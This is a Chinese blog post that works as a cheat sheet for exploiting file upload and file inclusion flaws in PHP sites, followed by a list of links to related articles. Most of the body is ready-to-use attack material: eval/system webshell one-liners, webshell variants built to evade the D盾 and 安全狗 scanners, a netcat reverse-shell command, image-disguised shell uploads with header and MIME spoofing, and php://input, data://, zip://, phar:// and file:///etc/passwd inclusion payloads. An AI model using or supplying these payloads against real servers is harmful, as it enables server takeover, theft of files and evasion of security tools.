【漏洞利用】文件上传漏洞&文件包含漏洞利用

最新推荐文章于 2023-02-06 20:37:02 发布
最新推荐文章于 2023-02-06 20:37:02 发布
阅读量1.7k 收藏 4
点赞数
分类专栏: 渗透技巧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/b10d9/article/details/111143890
版权

【漏洞利用】文件上传漏洞&文件包含漏洞利用

一句话木马汇总

GitHub

中国蚁剑项目

PHP一句话

  1. 在服务端生成内容为一句话木马的shell.php文件,结合php://input使用。
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>`
  1. 将“nc IP PORT -e /bin/bash”作为cmd参数的值传递给服务端,攻击机开启nc监听模式。
<?php system($_GET["cmd"]) ?>

静态免杀PHP一句话

  1. 可绕过D盾,D盾对于eval中是否包含$比较敏感。
<?php
function a()
{
    return "/*asdas*/".$_POST['a'];
}

eval(a());
?>
  1. 可以绕过D盾和安全狗。
<?php
ob_start();
echo "/*sdjmz*/".$_GET["id"];
eval(ob_get_contents());
ob_flush();
?>

文件上传绕过

图片马制作

cmd

命令:copy image.jpg/b+shell.php image_shell.jpg,image.jpg为原图片文件,shell.php为一句话木马文件,image_shell.jpg合成后的图片马文件。
这种方式就是将两个文件并成一个文件,shell.php内容会在合并后文件的最末端。

图片头欺骗

GIF头绕过:(jpg/png都可以,但实操起来gif更方便一些,jpg这些需要编辑hex比较麻烦)

-----------------------------21394584637639125584139511981
Content-Disposition: form-data; name="file"; filename="php-reverse-shell.gif"
Content-Type: image/gif

GIF89a;

<?php system($_GET["cmd"]) ?>  
......

后缀名绕过

前端js验证

在上传的时候后缀改为允许上传的后缀名,然后抓包,再修改为PHP等后缀名。

双后缀名

上传文件时,将文件名改为如shell.php.jpg。

MIME类型绕过

抓包将mime类型改为允许的

文件包含漏洞(上传成功后的利用)

文件包含漏洞相关的函数

include()
include_once()
require()
require_once()

结合PHP伪协议

常见协议

file:// — 访问本地文件系统
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
phar:// — PHP 归档

利用方式

php://

语法:php://filter/read=convert.base64-encode/resource=网页文件,可以用于读取网页源代码。
利用条件:开启allow_url_fopen
下面例子,可以读取到网站index.php的源码,并且返回的源码内容是经过base64编码的。

/?file=php://filter/read=convert.base64-encode/resource=index.php

利用条件:开启allow_url_include=on
php://input可以配合post发送数据,让网站执行post发送的数据。
下面例子中,将data中的PHP代码通过PHP伪协议将其作为file参数的值传递给服务端。当服务端对file参数执行include函数,即可让服务端执行用户输入的代码。

http://ip/?file=php://input
在data中输入:
<?php phpinfo()?>   //显示PHPinfo信息,和结合其他函数,如system("命令")。
或
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>    //将一句话木马写入shell.php,并保存在服务器上。
data://

语法:data://text/plain;payload或base64,base64编码的payload,可以让服务端执行用户输入的代码。
利用条件:allow_url_fopen参数与allow_url_include都需开启。
下面例子中,让服务端执行了PHPinfo()。

index.php?file=data://text/plain,<?php phpinfo()?>
index.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
zip://

语法:zip://[压缩文件路径]#[压缩文件内的子文件名],绝对路径和相对路径即可,先将一句话木马文件压缩为zip,并上传至服务端,再利用zip://解压。
下面的例子中,将写入了一句话木马的shell.php文件,压缩为shell.zip,然后改为shell.jpg绕过图片上传限制。上传成功后,通过zip://让服务端解压并返回shell.php。
小细节:“#”需要手动写成“%23”

index.php?file=zip://shell.jpg%23shell.php
file://

语法:file://[文件的绝对路径和文件名],可以读取服务端的文件内容。
下面例子中,查看了服务端的passwd文件。

/?file=file:///etc/passwd
phar://

语法:phar://[压缩文件路径]/[压缩文件内的子文件名],绝对路径和相对路径即可,先将一句话木马文件压缩为zip,并上传至服务端,再利用phar://解压。
下面的例子中,将写入了一句话木马的shell.php文件,压缩为shell.zip,然后改为shell.jpg绕过图片上传限制。上传成功后,通过phar://让服务端解压并返回shell.php。

index.php?file=phar://1.jpg/1.php
包大人在此
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web安全文件上传文件包含漏洞解析
vivlol918的博客
05-14 1222
文件上传漏洞是指攻击者通过页面上传图片、文件等途径,将恶意脚本等文件上传到服务器上,从而控制服务器,实现攻击目的。
文件上传漏洞获取服务器权限,文件上传漏洞
weixin_34979632的博客
08-04 1585
一、文件上传漏洞概述文件上传漏洞就是利用文件的上传功能去上传可执行的脚本文件,并通过此脚本文件获得服务器的访问权限。常见的站点一般都有文件上传功能,例如上传用户头像、上传附件、编辑文档等。当我们没有过滤上传的文件时或者服务器配置不安全就会造成文件上传漏洞。若通过一些绕过手段,上传了webshell,就会造成服务器权限受到危害。二、WebShell“web”的含义是需要服务器开放web服务,“she...
网络安全:文件上传 + 一句话木马原理 + 菜刀的简单使用
热门推荐
垃圾管理员的垃圾站
09-01 1万+
很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸。 这里的疏忽是指,不对用户上传的内容进行检查。 仍旧以DVWA为例: 网站的本意是接受用户的图片(image),但后台代码却并没有对文件进行检测: 网页源码(部分截图): php处理源码: 文本也贴出来: File Upload Source vulner...
文件包含漏洞和上传漏洞
sunnygao的博客
09-29 3161
文章目录文件包含漏洞PHP文件包含漏洞远程文件包含漏洞截断包含JSP文件包含文件包含漏洞预防文件上传漏洞解析漏洞服务端检测目录验证文件内容检测预防方法一句话木马 sql注入,有sql盲注,基于布尔的注入,还有基于时间的注入,union的使用条件 字段数保持一致,可以用其他数据凑数补上。 文件包含漏洞 PHP文件包含漏洞文件包含:共用函数写到单个文件中,然后多次调用, ​ 文件包含漏洞:包含的文件可以被替换成恶意文件。 PHP提供了四个文件包含函数,分别是include() 找不到被包含的文件只会产生警
文件包含漏洞——实例
weixin_54055099的博客
09-24 3014
文件包含漏洞的实例
文件上传漏洞文件包含漏洞渗透
qq_41838217的博客
12-07 1207
文件上传漏洞渗透 原理:利用网站文件上传对文件类型、后缀等未检测的漏洞进行渗透攻击。 目的:将木马脚本上传至网站后台服务器获取增删改权限,删库跑路。 工具:kali, OWASP(Open Web Application Security Project Broken Web Applications),burpsuite,China Chopper 漏洞分析: if (($uploaded_type == "image/jpeg") && ($uploaded_size <
PHP伪协议-文件包含漏洞常用的伪协议
wangyuxiang946的博客
08-19 1万+
在实战中文件包含漏洞配合PHP的伪协议可以发挥重大的作用,比如读取文件源码,任意命令执行或者开启后门获取webshell等,常用的伪协议有 php://filter 读取文件源码 php://input 任意代码执行 data://text/plain 任意代码执行 zip:// 配合文件上传开启后门 下面拿ctf.show WEB模块的第3关举个栗子,这一关存在文件包含漏洞 php://filter php://filter 协议可以对打开的数据流进行筛选和过滤,常用于读取文件..
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3667
一些比较常用的php伪协议用法及部分演示过程
phar://、zip://伪协议进行shell上传
weixin_43749601的博客
06-18 1267
phar:// 环境:可上传png、jpg 首先写一个一句话木马shell.php接着压缩成zip文件。将后缀改为png文件进行上传,上传文件后使用shell工具进行连接。 http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.png/shell zip:// 环境:可上传png、zip 首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件,然后使用shell工具进行连接。 htt
文件上传漏洞利用与利用
weixin_45178890的博客
08-01 1243
文件上传漏洞 可以上传一句话木马 PHP一句话木马如下 木马的连接密码是value <?php @eval($_POST[value]);?> 我们看到这个地方有一个上传点 然后我们上传一个php的脚本看能不能上传成功 然后我们看到没有上传成功被拦截了 看一下源代码是什么 function checkFile() { var file = document.getE...
上传文件漏洞&解析漏洞
qq_29687403的博客
09-16 3252
本文致力于探索利用网站漏洞来上传非法文件的方法 类型1:前端验证 某些网站采用前端验证的方式限制用户上传文件,这时我们只需去除前端验证机制即可突破限制,完成上传。 例如:前端代码限制上传文件的类型只能为图片,因此我们上传php文件就会失败。使用firebug修改前端代码,删除验证的代码段,再次上传,即可成功。 类型2:MIME验证 对于上传的文件,上传时都会指明上传文件的类型,即MI
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
计算机病毒与防护:文件上传漏洞利用MIME校验.ppt
06-10
文件上传漏洞利用MIME校验是其中一种常见的安全问题。MIME(Multipurpose Internet Mail Extensions)是一种标准,用于定义不同文件扩展名所对应的打开方式,比如HTML文件对应"text/html",TXT文件对应"text/plain...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
最新发布
06-30
文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件包含漏洞两种。 文件包含漏洞的攻击步骤: 1. 准备...
文件上传漏洞训练平台.zip
10-14
此"文件上传漏洞训练平台.zip"提供了一个实战环境,让你可以逐步通过1到20关的挑战,深入理解和掌握如何发现并利用此类漏洞。在这个训练平台中,你将学习到关于文件上传漏洞的各种类型和防范策略。 首先,我们需要...
php 上传文件类型判断函数(避免上传漏洞 )
12-17
在PHP中,文件上传是常见的功能,但如果不加以限制和验证,可能会引发安全问题,比如文件上传漏洞。这种漏洞允许攻击者上传恶意文件到服务器,可能导致执行任意代码或破坏网站安全。为了防止这种情况,我们需要对...
文件上传】zip伪协议上传解析
serendipity1130的博客
08-29 1893
1.打开界面是登陆框,查看源码,发现有文件包含include($_GET['file']) 2.然后根据题目名称:文件上传,访问网址:/upload.php发现了文件上传点,先上传了jpg图片,发现不能用菜刀连接,应该是无法解析jpg。 3.因为有文件包含,所以考虑到使用伪协议包含木马图片的文件进行菜刀连接,因为都有过滤,最终尝试了zip伪协议可以进行访问。 4.方法:首先制作一句话木马的zip包,然后将后缀名改为jpg,进行上传,上传成功后复制图片地址,可以发现图片的地址为upload/2.jpg
文件包含支持的伪协议
qq_50673174的博客
05-15 8017
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议。
文件上传漏洞方法总结
qq_62886656的博客
04-24 4901
文件上传漏洞 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令 的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传 后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 一 客户端绕过 可以通过禁用js来上传php文件 通过利用 burp 抓包改包,先上传一个 png类型的木马,然后通过 burp 将其改为php 后缀名即可 二 服务端绕过 (1) 黑名单扩展名绕过
利用Web文件上传漏洞获取Webshell的实战教程
在"web网站文件上传漏洞和攻击-运维安全详细笔记"中,本文详细探讨了Web应用中的文件上传漏洞及其潜在威胁。...同时,对于安全测试人员来说,理解这些漏洞利用方法也有助于提升网络安全测试的有效性和深度。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值